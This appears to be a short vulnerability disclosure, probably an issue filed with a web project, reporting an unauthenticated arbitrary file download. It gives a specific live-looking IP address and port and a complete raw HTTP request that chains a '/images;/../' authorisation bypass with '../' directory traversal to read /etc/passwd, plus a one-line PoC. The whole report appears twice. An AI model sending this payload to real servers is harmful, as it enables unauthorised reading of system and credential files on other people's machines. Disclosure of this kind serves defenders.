Hi,guys!
There is a serious security problem in your code.
About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download
But it must use a account and password.
However, I found a new way to download any file in unauth.
That means I can download any file without authorization without using my account and password.
Here is the example
Target: http://106.15.186.197:8080
And the http data is:
GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1 Host: 106.15.186.197:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1poc: /images;/../backup/download?fileName=../../../../../../../../etc/passwd
Remember to use burpsuite not browser
Have a nice day!
Hi,guys! There is a serious security problem in your code. About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download But it must use a account and password. However, I found a new way to download any file in unauth. That means I can download any file without authorization without using my account and password. Here is the example
Target: http://106.15.186.197:8080 And the http data is:
GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1 Host: 106.15.186.197:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
poc: /images;/../backup/download?fileName=../../../../../../../../etc/passwd Remember to use burpsuite not browser Have a nice day!